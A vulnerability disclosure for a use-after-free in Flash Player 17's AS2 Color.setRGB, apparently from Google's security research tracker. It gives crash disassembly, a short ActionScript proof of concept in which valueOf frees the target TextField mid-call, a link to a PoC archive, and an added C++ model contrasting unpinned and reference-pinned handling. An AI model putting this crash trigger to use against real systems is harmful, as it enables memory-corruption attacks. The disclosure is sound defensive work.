Source: https://code.google.com/p/google-security-research/issues/detail?id=367&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Deadline tracking for Chromium VRP bug https://code.google.com/p/chromium/issues/detail?id=484610]

Credit is to bilou, working with the Chromium Vulnerability Rewards Program.

---

VULNERABILITY DETAILS

When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference to it remains on the stack.
VERSION

Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169
Operating System: Win7 x64 SP1

REPRODUCTION CASE

The Color constructor needs a target_mc object such as a MovieClip or a TextField. When Color.setRGB is called with a custom object, the numeric conversion of that object (its valueOf) runs arbitrary AS2 code, which can delete the target_mc object and lead to a use-after-free.

(These lines come from flashplayer17_sa.exe 17.0.0.169):
.text:004B82D0 push    esi
.text:004B82D1 mov     esi, [esp+4+arg_0]
.text:004B82D5 push    edi
.text:004B82D6 mov     edi, ecx
.text:004B82D8 mov     ecx, [edi+94h]      ; edi points to freed memory
.text:004B82DE and     ecx, 0FFFFFFFEh
.text:004B82E1 add     ecx, 3Ch
.text:004B82E4 mov     eax, esi
.text:004B82E6 call    sub_4B0724          ; crash below
...
.text:004B0724 mov     edx, [ecx]          ; crash here, ecx = 3Ch (null pointer)
.text:004B0726 cmp     edx, [eax]
.text:004B0728 jnz     short loc_4B077E

Compile the PoC with Flash CS5.5.
***************************************************************************
Content of as2_color_uaf.fla:
var tf:TextField = this.createTextField("tf", 1, 1, 1, 4, 4);

var o = new Object();
o.valueOf = function () {
    // Runs while the native setRGB still holds target_mc: remove (free) the TextField...
    tf.removeTextField();
    // ...then return a number so the conversion succeeds and setRGB carries on with the freed target.
    return 0x41414142;
};

var c = new Color(tf);
c.setRGB(o);
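
The following C++ model is an added example, not Flash Player's code or the reporter's. TextField, Stage, ScriptValue, ColorUnpinned, ColorPinned and the refcount/alive bookkeeping are assumptions made for illustration. It replays the PoC's sequence (coerce the argument, which re-enters script and removes the target, then touch the target) against a Color that dereferences its target after the callback, and against one that holds a reference across the native call, which is the general pattern for fixing this bug class: anything that can re-enter script must either pin the objects it is using or re-validate them afterwards.

```cpp
#include <functional>
#include <memory>
#include <vector>

// Reference-counted display object (assumed model). 'alive' stands in for the
// allocation still being valid; the Stage holds one reference while the object
// is on the display list.
struct TextField {
    int refs = 0;
    bool alive = true;
    unsigned rgb = 0;
};

static void retain(TextField* tf) { ++tf->refs; }
static void release(TextField* tf) {
    if (--tf->refs == 0) tf->alive = false;   // models the allocation being freed
}

// Owns the TextField objects; removeTextField drops the display list's reference,
// which is what the PoC's valueOf does from inside setRGB.
struct Stage {
    std::vector<std::unique_ptr<TextField>> storage;   // keeps memory valid so the model can inspect 'alive'
    TextField* createTextField() {
        storage.push_back(std::make_unique<TextField>());
        TextField* tf = storage.back().get();
        retain(tf);
        return tf;
    }
    void removeTextField(TextField* tf) { release(tf); }
};

// An AS2-style value whose numeric coercion runs script (valueOf) and may re-enter the player.
struct ScriptValue {
    std::function<unsigned()> valueOf;
};

// Vulnerable ordering: coerce the argument (runs script), then touch the target.
// Returns false when the write would land on a freed object; the real player has
// no such check, which is the crash in the disassembly above.
struct ColorUnpinned {
    TextField* target;
    bool setRGB(const ScriptValue& v) {
        unsigned rgb = v.valueOf();        // script may remove the target here
        if (!target->alive) return false;  // use-after-free caught by the model
        target->rgb = rgb;
        return true;
    }
};

// Hardened ordering: hold a reference for the duration of the native call, so script
// can take the field off the display list but cannot free it underneath us.
struct ColorPinned {
    TextField* target;
    bool setRGB(const ScriptValue& v) {
        retain(target);                    // pin across the re-entrant call
        unsigned rgb = v.valueOf();
        bool wrote = target->alive;        // still alive: our pin keeps refs >= 1
        if (wrote) target->rgb = rgb;
        release(target);                   // may free it now, after we are done with it
        return wrote;
    }
};

// Replays the PoC's sequence against one of the two Color implementations.
template <typename Color>
static bool runPoc() {
    Stage stage;
    TextField* tf = stage.createTextField();
    // Constructed valueOf mirroring the PoC: remove the target, then return a colour value.
    ScriptValue o{[&]() -> unsigned { stage.removeTextField(tf); return 0x41414142u; }};
    Color c{tf};
    return c.setRGB(o);
}

bool unpinnedSurvives() { return runPoc<ColorUnpinned>(); }  // false: the write hits a freed object
bool pinnedSurvives()   { return runPoc<ColorPinned>(); }    // true: the pin keeps the object alive
```

Calling unpinnedSurvives() and pinnedSurvives() from a main shows the two outcomes; the unpinned variant reports the freed-object write that the real player performs unconditionally, while the pinned variant completes the write and only lets the object go once the native call has returned.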
---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37860.zip